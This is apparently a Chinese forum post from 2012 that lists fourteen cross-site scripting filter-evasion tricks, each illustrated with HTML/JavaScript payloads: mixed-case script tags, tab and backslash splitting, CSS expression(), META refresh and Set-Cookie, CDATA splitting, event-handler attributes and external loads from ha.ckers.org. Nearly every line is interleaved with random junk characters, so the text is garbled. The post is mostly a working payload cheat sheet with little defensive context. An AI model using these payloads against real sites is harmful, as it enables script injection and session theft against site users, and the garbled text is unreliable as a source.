1. 改变字符大小写
2 u# _7 [, a, [/ W+ P u% s4 I/ D( G+ v
1 n6 J. c/ u; `) |0 a% n+ U+ w: C
6 e2 m8 d: K! Q
<sCript>alert(‘d’)</scRipT># e! J/ q# m( G! D# t3 m$ v- [% h
" C/ J5 S0 \9 ^$ a, `
2. 利用多加一些其它字符来规避Regular Expression的检查) q9 s, ]1 `$ `; m- n D, w1 |
; H# g% v( ^7 ]$ b ` <<script>alert(‘c’)//<</script>
9 f* d9 L; J( w; {- M1 F/ l' C+ H# A/ t$ J5 B) H
<SCRIPT a=">" SRC="t.js"></SCRIPT>
$ g# x0 M0 I! {
+ p1 \* A) Y8 t3 S0 x+ n; K9 Z <SCRIPT =">" SRC="t.js"></SCRIPT>
! e* Z" l5 @) m0 w
& i9 Z% U) p* t2 g <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
% Y# g2 D8 K. n; @0 W6 x' G( a4 g$ C) _, j, z9 V* _0 F
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
- S! ?7 G# f, j/ K8 k: I* m* m- J7 b5 W& x* `
<SCRIPT a=`>` SRC="t.js"></SCRIPT>0 D" z5 }) o. y
5 Q- @8 g& S' M% B <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
. U0 X6 j9 o" T$ ?( Q) H" @
1 w' g- e7 ?, P% ] b3. 以其它扩展名取代.js& f! L5 t0 h" B. N. g: }' S) S3 L
& @2 C" T( x, m( o3 h8 u- I* h <script src="bad.jpg"></script># U& a, v/ f7 y, S
5 c. @% ?2 ~: W0 ^1 B1 g9 l! V
4. 将Javascript写在CSS档里% V3 P' G9 }8 d4 H( E
+ R. `4 y" w% t2 {* j! x2 F" r <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">8 K1 t: I0 i* J1 B8 Q; }9 g4 L) t
" [2 P1 G, e5 w2 H
example:* S+ A, ]0 f4 s6 ]( J. T; ?
3 q+ D& I* j ~ u; N6 Z- r( I
body {& z+ @+ P& v: N* \
$ I! ~' r& E5 o6 }1 v ~4 ~0 W$ ]
background-image: url(‘javascript:alert("XSS");’)6 ^8 K' U% v# k: T
4 i4 r' m" C5 ~+ _! o
}
/ v; M2 L* [+ {( j# P- F
1 p7 X0 A0 r1 s5 t5. 在script的tag里加入一些其它字符: Q. U6 x) \/ ?- _. Q
5 N& V0 W/ k% x' U <SCRIPT/SRC="t.js"></SCRIPT>
2 v2 D9 E# B" D" X7 G9 I2 z! |8 p0 ?. ]- d+ d
<SCRIPT/anyword SRC="t.js"></SCRIPT>7 W" Z& L0 w i
/ P* q" r P$ a- P# C+ ~- r
6. 使用tab或是new line来规避 [+ T# T! J' D
" P" c P. }0 n7 w2 E <img src="jav ascr ipt:alert(‘XSS3′)">
. b% k! G! P- H* V8 J
$ L) W7 J- |: E; M& x& q- g" z5 m' g <img src="jav ascr ipt:alert(‘XSS3′)">
- n) p) A6 s, U9 j/ n2 g3 v* B/ O: a a; x7 W
<IMG SRC="jav ascript:alert(‘XSS’);">
1 e8 i3 y, I8 a
- h) c, R) D1 l2 P; K9 X -> tag/ f; k) L" Y# ^) q) h- C
4 A" k L( e# `, r g
-> new line4 L+ ]7 d; t( h7 ~3 h
! C4 k, Q7 C9 K7 V
7. 使用"\"来规避) N6 m! Q5 v7 ~3 {# \9 D- d F- v
: ]/ W3 p$ \& b6 p5 ~: t <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>2 D! L/ z. w, m3 x
0 @# {0 [% H- y" s
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
7 {) x, Y+ w( _; e) M0 I2 s& V1 n6 q* u6 [# [
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
) U! ^; ?4 c4 n1 O/ C' m% K3 J- T* B. h( e% L1 u
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">0 f# N, M$ E- x1 U: X# K
8 @3 t+ P- ]% z
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
, I+ X: e; c; [8 L; \& O, t! m" X" ~+ g# S2 p* h
8. 使用Hex encode来规避(也可能会把";"拿掉)
. C' ]8 }! R5 \- B9 @' |8 |$ ?: y& D8 V- ?1 r5 |; Q
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
4 f2 m$ M$ U) p( W2 o& f
: A# g( A( Y% {3 Y* Y& M 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
7 g) p; E# K6 i3 l+ I1 s* F
) X4 c i; e" q" u <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">. B7 \1 d H" S; S0 c3 _/ v
h8 m' S4 j N0 r! B
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">1 B4 ~( ^8 Y6 ?2 m$ m' m$ k
1 g/ n, ? r1 K C
9. script in HTML tag l+ S3 d* P m
. K' B- D; R5 @! ~4 d- C0 ` <body onload=」alert(‘onload’)」>' u( Z% E8 u" c J8 m) `
! {! p% F; A+ p8 B, n& a: C
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload. R( j" l' m% [9 Y2 l- s( z
3 ?+ r7 s! N3 l' ]6 N; y10. 在swf里含有xss的code
1 S% T& w, G6 |. C% | o$ F" n Z; o3 N3 ]( K" c- W
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
, A- {7 x7 h7 Y% b' n/ e" v: L0 X! Q
11. 利用CDATA将xss的code拆开,再组合起来。! N4 D5 A7 G0 i3 K* p
# W G& J8 O; N7 N5 b( P <XML ID=I><X><C>4 _( G$ W5 m! T* Q+ ` V
0 j' n$ G6 v- P) r3 O! S
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
: K {" t0 n1 v5 W3 ]
# {1 o0 R% i# i0 r3 X8 L </C></X>% c& ]9 ^5 Q/ e
- `9 b1 |. Z# D </xml>
6 h2 `( G2 s1 u8 V* Q* D
# Q8 w7 i4 ~7 @& `( o/ Q: p <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>8 e d4 U$ L$ C2 L5 u* ]
, ^, Y w2 p+ Q* G" [ <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
, K! v* G& S$ F6 j' \ A
: T5 L' e" T/ ^- J3 Q <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>6 Z+ @% I, O/ c2 F" B
" w$ |% p, p5 e) e/ @4 z1 t
12. 利用HTML+TIME。
; C$ h9 P5 h+ m* d9 i! [1 ?: d# v! B% O! j* m4 r
<HTML><BODY>! t/ Y6 p% d9 V1 B* Y/ r) L8 |
! y, g# i/ S2 Q: O) J
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">6 }- F* @2 A ^; c S( `; r
: A) s" X. K9 I- i6 T
<?import namespace="t" implementation="#default#time2">
; ~7 I" f! H0 X+ P- x: a* n r% S. j5 _7 d# T" I5 `& s
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">$ Q( G+ Z) j1 K6 y
' N6 r3 e+ N* ~$ G9 L% |
</BODY></HTML> @ J) @& ]# l
8 M% L3 y0 o: X X) E+ r. b& O# n
13. 透过META写入Cookie。1 r- \8 t9 {; \3 u
( _) O! L, R2 s0 M7 Y
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>"># k0 ~' e2 R$ k+ H: c
! G6 R' h; |0 v; R
14. javascript in src , href , url2 s( ^% S1 L( ]' C H* I
" d, F9 G- e* _( X! Q/ x
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
7 W) S9 h- @( @( O& x! e
6 g* U7 U1 G/ A- }7 v <img src="javascript:alert(‘XSS3′)">& |' D3 c g& W5 ~, _0 E/ [2 F1 h
/ r3 |% K" o- c2 ~9 R9 `7 H
<IMG DYNSRC="javascript:alert(‘XSS20′)">
" ]; @9 S' `; V7 H0 N/ h( [. ?3 U0 O0 M, d7 f# r q# s$ ]
<IMG LOWSRC="javascript:alert(‘XSS21′)">
, ]7 J4 P( X0 h& D% p5 ]# t9 T! i; R
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
0 d8 m E: @# A6 t8 M. h# w! d' o: d; p# q6 h
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
; E0 H$ ^5 Z+ F, j
, u3 T! N2 x# D+ Z <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
2 L4 c; t u t/ t! h9 H
( M* A v) g4 S+ @$ c <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
! ]* E [$ R: C9 W/ i0 l
8 e2 I' u1 T9 W1 A <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}: v. ~& O5 r/ I
4 Q2 ]0 G4 B+ ?: w3 S4 y0 A </STYLE><A CLASS=XSS></A>$ k* H! t" T @2 z" ?
. G1 y' x' D6 M/ ` <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
7 s8 k( j: T* e& ^; {+ n7 V; V9 p, O7 U
|
发表于 2012-12-31 09:59:28
收藏
支持
反对